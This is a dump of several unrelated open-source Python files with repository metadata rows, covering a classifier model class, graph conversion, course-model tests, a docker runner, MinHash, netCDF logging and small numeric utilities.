                    final_preds.append(args.tie_value)
                else:
                    final_preds.append(mode_pred[0])
            preds = np.array(final_preds)
        elif not multi_label and args.regression is True:
            # Regression: raw (squeezed) outputs are both preds and outputs.
            preds = np.squeeze(preds)
            model_outputs = preds
        else:
            model_outputs = preds
            if multi_label:
                # Binarize each label column, with either a shared or a
                # per-label threshold.
                if isinstance(args.threshold, list):
                    threshold_values = args.threshold
                    preds = [
                        [self._threshold(pred, threshold_values[i]) for i, pred in enumerate(example)]
                        for example in preds
                    ]
                else:
                    preds = [[self._threshold(pred, args.threshold) for pred in example] for example in preds]
            else:
                preds = np.argmax(preds, axis=1)

        # Map numeric predictions back to the user's label names.
        if self.args.labels_map and not self.args.regression:
            inverse_labels_map = {value: key for key, value in self.args.labels_map.items()}
            preds = [inverse_labels_map[pred] for pred in preds]

        if self.config.output_hidden_states:
            return preds, model_outputs, all_embedding_outputs, all_layer_hidden_states
        else:
            return preds, model_outputs
def _threshold(self, x, threshold):
if x >= threshold:
return 1
return 0
    def _move_model_to_device(self):
        """Move the wrapped model onto the device stored in self.device."""
        self.model.to(self.device)
def _get_inputs_dict(self, batch):
if isinstance(batch[0], dict):
inputs = {key: value.squeeze().to(self.device) for key, value in batch[0].items()}
inputs["labels"] = batch[1].to(self.device)
else:
batch = tuple(t.to(self.device) for t in batch)
inputs = {"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[3]}
# XLM, DistilBERT and RoBERTa don't use segment_ids
if self.args.model_type != "distilbert":
inputs["token_type_ids"] = batch[2] if self.args.model_type in ["bert", "xlnet", "albert"] else None
return inputs
def _get_last_metrics(self, metric_values):
return {metric: values[-1] for metric, values in metric_values.items()}
def _create_training_progress_scores(self, multi_label, **kwargs):
extra_metrics = {key: [] for key in kwargs}
if multi_label:
training_progress_scores = {
"global_step": [],
"LRAP": [],
"train_loss": [],
"eval_loss": [],
**extra_metrics,
}
else:
if self.model.num_labels == 2:
training_progress_scores = {
"global_step": [],
"tp": [],
"tn": [],
"fp": [],
"fn": [],
"mcc": [],
"train_loss": [],
"eval_loss": [],
**extra_metrics,
}
elif self.model.num_labels == 1:
training_progress_scores = {
"global_step": [],
"train_loss": [],
"eval_loss": [],
**extra_metrics,
}
else:
training_progress_scores = {
"global_step": [],
"mcc": [],
"train_loss": [],
"eval_loss": [],
**extra_metrics,
}
return training_progress_scores
def _save_model(self, output_dir=None, optimizer=None, scheduler=None, model=None, results=None):
if not output_dir:
output_dir = self.args.output_dir
os.makedirs(output_dir, exist_ok=True)
if model and not self.args.no_save:
# Take care of distributed/parallel training
model_to_save = model.module if hasattr(model, "module") else model
model_to_save.save_pretrained(output_dir)
self.tokenizer.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, "training_args.bin"))
if optimizer and scheduler and self.args.save_optimizer_and_scheduler:
torch.save(optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt"))
torch.save(scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt"))
self._save_model_args(output_dir)
if results:
output_eval_file = os.path.join(output_dir, "eval_results.txt")
with open(output_eval_file, "w") as writer:
for key in sorted(results.keys()):
writer.write("{} = {}\n".format(key, str(results[key])))
    def _save_model_args(self, output_dir):
        """Serialize self.args into output_dir (created if missing)."""
        os.makedirs(output_dir, exist_ok=True)
        self.args.save(output_dir)
    def _load_model_args(self, input_dir):
        """Load and return a ClassificationArgs instance from `input_dir`."""
        args = ClassificationArgs()
        args.load(input_dir)
        return args
def get_named_parameters(self):
return [n for n, p in self.model.named_parameters()]
| 45.59827 | 214 | 0.578887 |
ded88f755816af6203933e55d17f2d4dd6251387 | 776 | py | Python | CCscripts/sgToGraph.py | mrvollger/SDA | eba7d36d0cadf9eba42053b7d2a3371247eebe1b | [
"MIT"
] | 21 | 2019-11-11T10:09:47.000Z | 2022-03-28T01:22:12.000Z | CCscripts/sgToGraph.py | mrvollger/SDA | eba7d36d0cadf9eba42053b7d2a3371247eebe1b | [
"MIT"
] | 12 | 2019-11-04T23:30:25.000Z | 2021-12-04T12:49:26.000Z | CCscripts/sgToGraph.py | mrvollger/SDA | eba7d36d0cadf9eba42053b7d2a3371247eebe1b | [
"MIT"
] | 4 | 2019-11-15T09:52:24.000Z | 2021-04-07T16:42:54.000Z | #!/usr/bin/env python
import argparse
import networkx as nx
import ABPUtils
import sys
ap = argparse.ArgumentParser(description="Converg sg_edges_list to graph")
ap.add_argument("input", help="Input file (should be sg_edges_list, but not assuming anything")
ap.add_argument("output", help="Output file. (gml format)")
args = ap.parse_args()
inFile = open(args.input)
if inFile is None:
print "ERROR. Could not open " + args.input
sys.exit(1)
edges = []
vertices = {}
for line in inFile:
v = line.split()
vertices[v[0]] = True
vertices[v[1]] = True
if (v[-1] != "TR"):
edges.append((v[0],v[1]))
g = nx.Graph()
for v in vertices.keys():
g.add_node(v)
for e in edges:
g.add_edge(e[0],e[1])
ABPUtils.WriteGraph(g, args.output)
| 20.972973 | 95 | 0.662371 |
64843030ce2d38f452f0e30806f5241809307e78 | 238 | py | Python | notebooks/__code/metadata_overlapping_images/general_classes.py | mabrahamdevops/python_notebooks | 6d5e7383b60cc7fd476f6e85ab93e239c9c32330 | [
"BSD-3-Clause"
] | null | null | null | notebooks/__code/metadata_overlapping_images/general_classes.py | mabrahamdevops/python_notebooks | 6d5e7383b60cc7fd476f6e85ab93e239c9c32330 | [
"BSD-3-Clause"
] | null | null | null | notebooks/__code/metadata_overlapping_images/general_classes.py | mabrahamdevops/python_notebooks | 6d5e7383b60cc7fd476f6e85ab93e239c9c32330 | [
"BSD-3-Clause"
] | null | null | null |
class ScaleSettings:
    """Default geometry and colour for the scale overlay.

    NOTE(review): values look like pixel units and screen coordinates --
    confirm against the widget that consumes these settings.
    """
    x0 = 50
    y0 = 50
    thickness = 10
    cursor_width = 10
    cursor_height = 10
    color = [255, 255, 255] # white
class MetadataSettings:
    """Default position and colour for the metadata overlay.

    NOTE(review): presumably pixel coordinates -- confirm with the caller.
    """
    x0 = 200
    y0 = 200
    color = [255, 255, 255] # white
| 13.222222 | 36 | 0.567227 |
3c6d6d288a5896d2c7805bbd972f16365752f82b | 6,465 | py | Python | test_naucse/test_model.py | befeleme/naucse.python.cz | dee2c8cce8db90108b01b40c0981053943352d11 | [
"MIT"
] | 4 | 2019-02-14T08:02:41.000Z | 2020-10-20T10:35:55.000Z | test_naucse/test_model.py | befeleme/naucse.python.cz | dee2c8cce8db90108b01b40c0981053943352d11 | [
"MIT"
] | 71 | 2018-08-26T22:31:39.000Z | 2022-01-20T10:29:23.000Z | test_naucse/test_model.py | befeleme/naucse.python.cz | dee2c8cce8db90108b01b40c0981053943352d11 | [
"MIT"
] | 40 | 2018-08-22T14:44:59.000Z | 2021-09-20T16:11:27.000Z | from pathlib import Path
import os
import pytest
import yaml
from naucse import models
from naucse.edit_info import get_local_repo_info
from test_naucse.conftest import fixture_path, dummy_schema_url_factory
from test_naucse.conftest import assert_yaml_dump, add_test_course
def test_empty_model():
    """A freshly constructed Root has no courses, licenses, run years or URL."""
    model = models.Root()
    assert not model.courses
    assert not model.licenses
    assert not model.run_years
    assert model.get_pks() == {}
    with pytest.raises(models.NoURL):
        model.get_url()
def test_licenses():
    """Licenses load from the fixture dir with the expected slug/url/title."""
    model = models.Root()
    model.load_licenses(fixture_path / 'licenses')
    assert sorted(model.licenses) == ['cc-by-sa-40', 'cc0']
    assert model.licenses['cc0'].slug == 'cc0'
    assert model.licenses['cc0'].url.endswith('/publicdomain/zero/1.0/')
    assert model.licenses['cc0'].title.endswith('Public Domain Dedication')
    assert model.licenses['cc-by-sa-40'].slug == 'cc-by-sa-40'
    assert model.licenses['cc-by-sa-40'].url.endswith('/licenses/by-sa/4.0/')
    assert model.licenses['cc-by-sa-40'].title.endswith('4.0 International')
def test_dump_empty_model():
    """Dumping an empty Root matches the stored YAML fixture."""
    model = models.Root(schema_url_factory=dummy_schema_url_factory)
    assert_yaml_dump(models.dump(model), 'empty-root.yml')
def test_load_empty_dir():
    """load_local_courses on a fixture dir without course data raises and
    leaves the model without courses."""
    model = models.Root()
    with pytest.raises(FileNotFoundError):
        model.load_local_courses(fixture_path / 'empty-directory')
    assert not model.courses
def test_no_courses():
    """Loading a directory with no courses gives only an empty "lessons" course
    """
    model = models.Root()
    model.load_local_courses(fixture_path / 'empty-lessons-dir')
    assert sorted(model.courses) == ['lessons']
    assert not model.courses['lessons'].sessions
    assert not model.courses['lessons'].lessons
def test_load_courses():
    """Courses load from fixtures under both slug styles plus "lessons"."""
    model = models.Root()
    model.load_local_courses(fixture_path / 'minimal-courses')
    assert sorted(model.courses) == [
        '2019/minimal', 'courses/minimal', 'lessons',
    ]
    assert model.courses['courses/minimal'].title == 'A minimal course'
    assert model.courses['courses/minimal'].slug == 'courses/minimal'
    assert model.courses['2019/minimal'].title == 'A minimal course'
    assert model.courses['2019/minimal'].slug == '2019/minimal'
    assert model.courses['lessons'].title == 'Kanonické lekce'
    assert model.courses['lessons'].slug == 'lessons'
def test_add_local_course():
    """A single course added via Course.load_local is registered under its slug."""
    model = models.Root()
    path = fixture_path / 'minimal-courses'
    model.add_course(models.Course.load_local(
        parent=model,
        path=path,
        repo_info=get_local_repo_info(path),
        slug='courses/minimal',
    ))
    assert sorted(model.courses) == ['courses/minimal']
    assert model.courses['courses/minimal'].title == 'A minimal course'
    assert model.courses['courses/minimal'].slug == 'courses/minimal'
def test_dump_local_course(model):
    """Dumps of a model with one local course match the YAML fixtures."""
    path = fixture_path / 'minimal-courses'
    model.add_course(models.Course.load_local(
        parent=model,
        path=path,
        repo_info=get_local_repo_info(path),
        slug='courses/minimal',
    ))
    assert_yaml_dump(models.dump(model), 'minimal-root.yml')
    course = model.courses['courses/minimal']
    assert_yaml_dump(models.dump(course), 'minimal-course.yml')
def test_add_course_from_data():
    """A course built from an in-memory dict is registered under its slug."""
    model = models.Root()
    add_test_course(model, 'courses/minimal', {
        'title': 'A minimal course',
        'sessions': [],
    })
    assert sorted(model.courses) == ['courses/minimal']
    assert model.courses['courses/minimal'].title == 'A minimal course'
    assert model.courses['courses/minimal'].slug == 'courses/minimal'
def test_run_years(model):
    """run_years indexes dated courses by every year they span; self-study
    courses (no sessions) never appear in it."""
    assert model.run_years == {}
    # Add a self-study course. It should not appear in run_years.
    add_test_course(model, 'courses/minimal', {
        'title': 'A minimal course',
        'sessions': [],
    })
    assert model.run_years == {}
    assert sorted(model.courses) == ['courses/minimal']
    assert sorted(model.self_study_courses) == ['courses/minimal']
    course_minimal = model.courses['courses/minimal']
    assert course_minimal.start_date == None
    assert course_minimal.end_date == None
    # Add a course with a single session. It should appear in its run_year.
    add_test_course(model, '2019/single-session', {
        'title': 'A course with a single session',
        'sessions': [
            {
                'title': 'One session',
                'slug': 'foo',
                'date': '2019-01-05',
                'materials': [],
            },
        ],
    })
    assert sorted(model.courses) == ['2019/single-session', 'courses/minimal']
    assert sorted(model.self_study_courses) == ['courses/minimal']
    course_2019 = model.courses['2019/single-session']
    assert course_2019.start_date.year == 2019
    assert course_2019.end_date.year == 2019
    assert sorted(model.run_years) == [2019]
    assert model.run_years[2019] == {'2019/single-session': course_2019}
    # Add a course spanning 3 years. Should appear in all run_years it spans.
    # (Even if there are no sessions that year.)
    add_test_course(model, '2017/multi-year', {
        'title': 'A course with sessions in years 2017 and 2019',
        'sessions': [
            {
                'title': 'First session, 2017',
                'slug': 'one',
                'date': '2017-01-05',
                'materials': [],
            },
            {
                'title': 'Last session, 2019',
                'slug': 'two',
                'date': '2019-01-05',
                'materials': [],
            },
        ],
    })
    assert sorted(model.courses) == [
        '2017/multi-year', '2019/single-session', 'courses/minimal',
    ]
    assert sorted(model.self_study_courses) == ['courses/minimal']
    course_2017 = model.courses['2017/multi-year']
    assert course_2017.start_date.year == 2017
    assert course_2017.end_date.year == 2019
    assert sorted(model.run_years) == [2017, 2018, 2019]
    for year in 2017, 2018:
        assert model.run_years[year] == {'2017/multi-year': course_2017}
    assert model.run_years[2019] == {
        '2017/multi-year': course_2017,
        '2019/single-session': course_2019,
    }
    assert_yaml_dump(models.dump(model), 'run-years/root.yml')
    for year, run_year in model.run_years.items():
        assert_yaml_dump(models.dump(run_year), f'run-years/{year}.yml')
| 32.164179 | 78 | 0.647486 |
24e1994095a6f8b720c4accb8a4cee07a5967176 | 73 | py | Python | code_stats/utils/__init__.py | abhinavshaw1993/code-stat | b98dede12dc01464938f1d8eb21b8219501239fc | [
"MIT"
] | 4 | 2019-08-23T00:53:12.000Z | 2020-01-16T06:25:43.000Z | code_stats/utils/__init__.py | abhinavshaw1993/code-stats | b98dede12dc01464938f1d8eb21b8219501239fc | [
"MIT"
] | null | null | null | code_stats/utils/__init__.py | abhinavshaw1993/code-stats | b98dede12dc01464938f1d8eb21b8219501239fc | [
"MIT"
] | null | null | null | __all__ = ['files_and_folders_utils', 'conversion_utils', 'print_utils']
| 36.5 | 72 | 0.780822 |
a21fe04b4f7a7e7082b7b0902977d755856ec415 | 606 | py | Python | python/docker_runner.py | spawnfest/metaparticler | 8dd17ab4fa76af0cd9eb6198fa02de18461236dd | [
"MIT"
] | 1 | 2018-11-02T14:40:31.000Z | 2018-11-02T14:40:31.000Z | python/docker_runner.py | spawnfest/metaparticler | 8dd17ab4fa76af0cd9eb6198fa02de18461236dd | [
"MIT"
] | null | null | null | python/docker_runner.py | spawnfest/metaparticler | 8dd17ab4fa76af0cd9eb6198fa02de18461236dd | [
"MIT"
] | null | null | null | import os
def ports(options):
    """Build the docker `-p` port-publishing flags from options['ports'].

    Each entry is published host:container on the same port number, e.g.
    [80, 443] -> " -p 80:80 -p 443:443".  Returns "" for an empty list and
    keeps the historical ' ' placeholder when the 'ports' key is absent.
    """
    try:
        # FIX: removed a leftover debug print of options['ports'].
        # The KeyError from a missing 'ports' key is raised when join
        # consumes the generator, so it is still caught below.
        return "".join(" -p {0}:{0}".format(port) for port in options['ports'])
    except KeyError:
        return ' '
def run(img, name, options):
    """Start the image as a detached container, then stream its logs.

    NOTE(review): os.system interpolates the arguments into a shell string;
    subprocess.run with an argument list would be safer against injection.
    """
    launch_command = 'docker run --rm --name {} {} -d {}'.format(
        name,
        ports(options),
        img
    )
    os.system(launch_command)
    # Attach to logs
    os.system('docker logs -f {}'.format(name))
def cancel(name):
    """Force-stop the named container, then remove it.

    NOTE(review): `run` starts containers with --rm, so the explicit
    `docker rm` is usually a no-op -- kept for containers started otherwise.
    """
    os.system('docker kill {}'.format(name))
    os.system('docker rm {}'.format(name))
| 20.896552 | 58 | 0.539604 |
5d31b3b576ed84c8457806eca29b23c465e16325 | 1,523 | py | Python | pipeline/tests/core/flow/test_converge_gateway.py | sdgdsffdsfff/bk-sops-tencent | e8aff91f822e79031e12b0f66943830f44ced506 | [
"Apache-2.0"
] | 1 | 2020-09-24T07:39:16.000Z | 2020-09-24T07:39:16.000Z | pipeline/tests/core/flow/test_converge_gateway.py | sdgdsffdsfff/bk-sops-tencent | e8aff91f822e79031e12b0f66943830f44ced506 | [
"Apache-2.0"
] | 5 | 2021-02-08T20:46:54.000Z | 2021-06-10T22:54:45.000Z | pipeline/tests/core/flow/test_converge_gateway.py | sdgdsffdsfff/bk-sops-tencent | e8aff91f822e79031e12b0f66943830f44ced506 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.test import TestCase
from pipeline.core.flow.base import FlowNode, SequenceFlow
from pipeline.core.flow.gateway import Gateway, ConvergeGateway, ParallelGateway
class TestConvergeGateway(TestCase):
    """Tests for ConvergeGateway's type hierarchy and flow traversal."""
    def test_converge_gateway(self):
        # A converge gateway must be both a FlowNode and a Gateway.
        gw_id = '1'
        cvg_gateway = ConvergeGateway(gw_id)
        self.assertTrue(isinstance(cvg_gateway, FlowNode))
        self.assertTrue(isinstance(cvg_gateway, Gateway))
    def test_next(self):
        # Wire cvg -> parallel with a single sequence flow; next() must
        # follow the only outgoing flow to the parallel gateway.
        cvg_gateway = ConvergeGateway('1')
        parallel_gateway = ParallelGateway('2', 'cvg')
        out_flow = SequenceFlow('flow', cvg_gateway, parallel_gateway)
        cvg_gateway.outgoing.add_flow(out_flow)
        parallel_gateway.incoming.add_flow(out_flow)
        self.assertEqual(parallel_gateway, cvg_gateway.next())
| 46.151515 | 115 | 0.759685 |
6d2bcf759d600009b1afab03432f4f2686f1fae9 | 2,421 | py | Python | pspec/logData.py | JoyMonteiro/parSPectral | 866eebc29e8b0df749131d20dbcafaee321079b3 | [
"BSD-3-Clause"
] | 2 | 2015-03-25T10:35:47.000Z | 2017-10-17T08:51:48.000Z | pspec/logData.py | JoyMonteiro/parSPectral | 866eebc29e8b0df749131d20dbcafaee321079b3 | [
"BSD-3-Clause"
] | null | null | null | pspec/logData.py | JoyMonteiro/parSPectral | 866eebc29e8b0df749131d20dbcafaee321079b3 | [
"BSD-3-Clause"
] | 1 | 2015-03-25T10:35:49.000Z | 2015-03-25T10:35:49.000Z | from netCDF4 import Dataset;
class logData(object):
    """
    This class is a wrapper over the netCDF4 library to simplify
    writing fields to a nc file
    """
    # NOTE: Python 2 code (print statements); keep running under Python 2.
    def __init__(self, filename, fieldnames, dimNames, dims, cords, time_step, currTime=0, \
            overwrite=False):
        # filename: output .nc file; fieldnames: variables to log each step;
        # dimNames/dims: spatial dimension names and sizes; cords: (lats, lons)
        # coordinate arrays; time_step: step between writes (appears to be in
        # seconds, since currTime advances by time_step/(24*3600) -- i.e. time
        # is tracked in days; TODO confirm with callers).
        assert len(dimNames) == len(dims), \
            "number of dimensions must match dimension names";
        self.name = filename;
        self.fields = fieldnames;
        self.dims = dims;
        self.currTime = currTime;
        self.time_step = time_step
        self.ii = 0
        self.lats = cords[0]
        self.lons = cords[1]
        self.ncFile = Dataset(filename, 'w', clobber=overwrite)
        # create a time dimension
        if 'time' not in dimNames:
            self.ncFile.createDimension('time', None);
        # Create dimensions
        for i in range(len(dims)):
            self.ncFile.createDimension(dimNames[i], dims[i]);
        # Create variables
        self.ncFile.createVariable('time', 'f4', ('time',))
        for i in range(len(fieldnames)):
            # Each logged field spans every dimension (time + spatial dims).
            self.ncFile.createVariable(fieldnames[i],'f8', \
                    self.ncFile.dimensions.keys());
        self.ncFile.createVariable('latitude', 'f8', (dimNames[0],))
        self.ncFile.createVariable('longitude', 'f8', (dimNames[1],))
        self.ncFile.variables['latitude'][:] = self.lats
        self.ncFile.variables['longitude'][:] = self.lons
        self.ncFile.description = 'Simulation data';
        print 'Created file ' + filename;
    def writeData(self, fields):
        # Write one time slice: `fields` must supply every logged variable,
        # in the same order the variables were created.
        assert len(fields) == len(self.fields), \
            "all fields must be written at the same time.";
        j = self.ii
        t = self.currTime
        print 'Writing data at time: ', t;
        # Everything except the time/coordinate variables is a data field.
        variable = self.ncFile.variables.keys();
        variable.remove('time')
        variable.remove('latitude')
        variable.remove('longitude')
        self.ncFile.variables['time'][j] = t
        for i in range(len(variable)):
            temp = self.ncFile.variables[variable[i]];
            temp[j,:] = fields[i];
        # Advance bookkeeping: time in days, plus the record index.
        self.currTime += self.time_step/(24*3600.)
        self.ii +=1
    def finishLogging(self):
        # Report what was written and close the dataset (flushes to disk).
        print 'Finished logging data to ', self.name;
        print 'number of time steps stored: ', \
            len(self.ncFile.variables['time']);
        self.ncFile.close();
| 23.970297 | 92 | 0.577447 |
621a0b187dad1e9191e10f0847749cd1d9f6fc87 | 8,905 | py | Python | datasketch/minhash.py | yrik/datasketch | 82d9639bc0011932a952bbae1d4b5bd5ac03c7c8 | [
"MIT"
] | null | null | null | datasketch/minhash.py | yrik/datasketch | 82d9639bc0011932a952bbae1d4b5bd5ac03c7c8 | [
"MIT"
] | null | null | null | datasketch/minhash.py | yrik/datasketch | 82d9639bc0011932a952bbae1d4b5bd5ac03c7c8 | [
"MIT"
] | null | null | null | import random, copy, struct
from hashlib import sha1
import numpy as np
# The size of a hash value in number of bytes
hashvalue_byte_size = len(bytes(np.int64(42).data))

# http://en.wikipedia.org/wiki/Mersenne_prime
_mersenne_prime = (1 << 61) - 1
_max_hash = (1 << 32) - 1
_hash_range = (1 << 32)

class MinHash(object):
    '''MinHash is a probabilistic data structure for computing
    `Jaccard similarity`_ between sets.
    Args:
        num_perm (int, optional): Number of random permutation functions.
            It will be ignored if `hashvalues` is not None.
        seed (int, optional): The random seed controls the set of random
            permutation functions generated for this MinHash.
        hashobj (optional): The hash function used by this MinHash.
            It must implements
            the `digest()` method similar to hashlib_ hash functions, such
            as `hashlib.sha1`.
        hashvalues (`numpy.array` or `list`, optional): The hash values is
            the internal state of the MinHash. It can be specified for faster
            initialization using the existing state from another MinHash.
        permutations (optional): The permutation function parameters. This argument
            can be specified for faster initialization using the existing
            state from another MinHash.
    Note:
        To save memory usage, consider using :class:`datasketch.LeanMinHash`.
    Note:
        Since version 1.1.1, MinHash will only support serialization using
        `pickle`_. ``serialize`` and ``deserialize`` methods are removed,
        and are supported in :class:`datasketch.LeanMinHash` instead.
        MinHash serialized before version 1.1.1 cannot be deserialized properly
        in newer versions (`need to migrate? <https://github.com/ekzhu/datasketch/issues/18>`_).
    Note:
        Since version 1.1.3, MinHash uses Numpy's random number generator
        instead of Python's built-in random package. This change makes the
        hash values consistent across different Python versions.
        The side-effect is that now MinHash created before version 1.1.3 won't
        work (i.e., ``jaccard``, ``merge`` and ``union``)
        with those created after.
    .. _`Jaccard similarity`: https://en.wikipedia.org/wiki/Jaccard_index
    .. _hashlib: https://docs.python.org/3.5/library/hashlib.html
    .. _`pickle`: https://docs.python.org/3/library/pickle.html
    '''

    def __init__(self, num_perm=128, seed=1, hashobj=sha1,
            hashvalues=None, permutations=None):
        if hashvalues is not None:
            num_perm = len(hashvalues)
        if num_perm > _hash_range:
            # Because 1) we don't want the size to be too large, and
            # 2) we are using 4 bytes to store the size value
            raise ValueError("Cannot have more than %d number of\
                    permutation functions" % _hash_range)
        self.seed = seed
        self.hashobj = hashobj
        # Initialize hash values
        if hashvalues is not None:
            self.hashvalues = self._parse_hashvalues(hashvalues)
        else:
            self.hashvalues = self._init_hashvalues(num_perm)
        # Initalize permutation function parameters
        if permutations is not None:
            self.permutations = permutations
        else:
            generator = np.random.RandomState(self.seed)
            # Create parameters for a random bijective permutation function
            # that maps a 32-bit hash value to another 32-bit hash value.
            # http://en.wikipedia.org/wiki/Universal_hashing
            self.permutations = np.array([(generator.randint(1, _mersenne_prime, dtype=np.uint64),
                                           generator.randint(0, _mersenne_prime, dtype=np.uint64))
                                          for _ in range(num_perm)], dtype=np.uint64).T
        if len(self) != len(self.permutations[0]):
            raise ValueError("Numbers of hash values and permutations mismatch")

    def _init_hashvalues(self, num_perm):
        return np.ones(num_perm, dtype=np.uint64)*_max_hash

    def _parse_hashvalues(self, hashvalues):
        return np.array(hashvalues, dtype=np.uint64)

    def update(self, b):
        '''Update this MinHash with a new value.
        Args:
            b (bytes): The value of type `bytes`.
        Example:
            To update with a new string value:
            .. code-block:: python
                minhash.update("new value".encode('utf-8'))
        '''
        hv = struct.unpack('<I', self.hashobj(b).digest()[:4])[0]
        a, b = self.permutations
        phv = np.bitwise_and((a * hv + b) % _mersenne_prime, np.uint64(_max_hash))
        self.hashvalues = np.minimum(phv, self.hashvalues)

    def jaccard(self, other):
        '''Estimate the `Jaccard similarity`_ (resemblance) between the sets
        represented by this MinHash and the other.
        Args:
            other (datasketch.MinHash): The other MinHash.
        Returns:
            float: The Jaccard similarity, which is between 0.0 and 1.0.
        '''
        if other.seed != self.seed:
            raise ValueError("Cannot compute Jaccard given MinHash with\
                    different seeds")
        if len(self) != len(other):
            raise ValueError("Cannot compute Jaccard given MinHash with\
                    different numbers of permutation functions")
        # FIX: np.float was deprecated in NumPy 1.20 and removed in 1.24;
        # the builtin float is the documented replacement.
        return float(np.count_nonzero(self.hashvalues==other.hashvalues)) /\
                float(len(self))

    def count(self):
        '''Estimate the cardinality count based on the technique described in
        `this paper <http://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=365694>`_.
        Returns:
            int: The estimated cardinality of the set represented by this MinHash.
        '''
        k = len(self)
        # FIX: np.float -> float (alias removed in NumPy 1.24).
        return float(k) / np.sum(self.hashvalues / float(_max_hash)) - 1.0

    def merge(self, other):
        '''Merge the other MinHash with this one, making this one the union
        of both.
        Args:
            other (datasketch.MinHash): The other MinHash.
        '''
        if other.seed != self.seed:
            raise ValueError("Cannot merge MinHash with\
                    different seeds")
        if len(self) != len(other):
            raise ValueError("Cannot merge MinHash with\
                    different numbers of permutation functions")
        self.hashvalues = np.minimum(other.hashvalues, self.hashvalues)

    def digest(self):
        '''Export the hash values, which is the internal state of the
        MinHash.
        Returns:
            numpy.array: The hash values which is a Numpy array.
        '''
        return copy.copy(self.hashvalues)

    def is_empty(self):
        '''
        Returns:
            bool: If the current MinHash is empty - at the state of just
                initialized.
        '''
        if np.any(self.hashvalues != _max_hash):
            return False
        return True

    def clear(self):
        '''
        Clear the current state of the MinHash.
        All hash values are reset.
        '''
        self.hashvalues = self._init_hashvalues(len(self))

    def copy(self):
        '''
        :returns: datasketch.MinHash -- A copy of this MinHash by exporting its state.
        '''
        return MinHash(seed=self.seed, hashvalues=self.digest(),
                permutations=self.permutations)

    def __len__(self):
        '''
        :returns: int -- The number of hash values.
        '''
        return len(self.hashvalues)

    def __eq__(self, other):
        '''
        :returns: bool -- If their seeds and hash values are both equal then two are equivalent.
        '''
        return self.seed == other.seed and \
                np.array_equal(self.hashvalues, other.hashvalues)

    @classmethod
    def union(cls, *mhs):
        '''Create a MinHash which is the union of the MinHash objects passed as arguments.
        Args:
            *mhs: The MinHash objects to be united. The argument list length is variable,
                but must be at least 2.
        Returns:
            datasketch.MinHash: A new union MinHash.
        '''
        if len(mhs) < 2:
            raise ValueError("Cannot union less than 2 MinHash")
        num_perm = len(mhs[0])
        seed = mhs[0].seed
        if any((seed != m.seed or num_perm != len(m)) for m in mhs):
            raise ValueError("The unioning MinHash must have the\
                    same seed and number of permutation functions")
        hashvalues = np.minimum.reduce([m.hashvalues for m in mhs])
        permutations = mhs[0].permutations
        return cls(num_perm=num_perm, seed=seed, hashvalues=hashvalues,
                permutations=permutations)
| 40.112613 | 98 | 0.606513 |
7383abbf1008965769b81d3d65404d0801abaa1d | 223 | py | Python | src/028-number-spiral-diagonals/python/solver.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | 1 | 2018-01-26T21:18:12.000Z | 2018-01-26T21:18:12.000Z | src/028-number-spiral-diagonals/python/solver.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | 3 | 2017-12-09T14:49:30.000Z | 2017-12-09T14:59:39.000Z | src/028-number-spiral-diagonals/python/solver.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | null | null | null | def solve(m):
    # Running total of the diagonal values, seeded with the centre cell (1).
    # NOTE(review): `sum` shadows the builtin -- left unchanged (comments only).
    sum = 1
    cur = 1
    # Walk the concentric "rings" of the number spiral (presumably m is the
    # spiral's side length -- confirm with the caller).  Within one ring the
    # four corner values are exactly `ring` apart, so step by `ring` and
    # accumulate four times per ring.
    for ring in range(2, m, 2):
        cur += ring
        sum += cur
        cur += ring
        sum += cur
        cur += ring
        sum += cur
        cur += ring
        sum += cur
    # Sum of the numbers on both diagonals of the spiral.
    return sum
| 13.9375 | 30 | 0.426009 |
a55c71e60f3b74220c1de0e24e384deafa4f483d | 100 | py | Python | python/testData/inspections/PyCallingNonCallableInspection/concealer.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/inspections/PyCallingNonCallableInspection/concealer.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/inspections/PyCallingNonCallableInspection/concealer.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | def concealer():
class prog(object):
def __call__(self): pass
pr = prog()
pr()
| 14.285714 | 32 | 0.54 |
d92c9b2da2362b78299759788007df36c25fcfdf | 2,950 | py | Python | merrill_feature/feature_selection/func.py | edazizovv/merrill_feature | 59c7fd10e833a3376ee8ca3c631a73f0a2357c4f | [
"MIT"
] | null | null | null | merrill_feature/feature_selection/func.py | edazizovv/merrill_feature | 59c7fd10e833a3376ee8ca3c631a73f0a2357c4f | [
"MIT"
] | null | null | null | merrill_feature/feature_selection/func.py | edazizovv/merrill_feature | 59c7fd10e833a3376ee8ca3c631a73f0a2357c4f | [
"MIT"
] | null | null | null | #
#
import numpy
from scipy import stats
from sklearn.linear_model import LinearRegression
from sklearn.feature_selection import mutual_info_regression
#
#
def pearson(x, y):
    """Pearson correlation coefficient between x and y (p-value discarded)."""
    coefficient = stats.pearsonr(x, y)[0]
    return coefficient
class Correlated:
    """Scores a feature x against a target y by fitting a single-feature
    model and Pearson-correlating its predictions with y."""

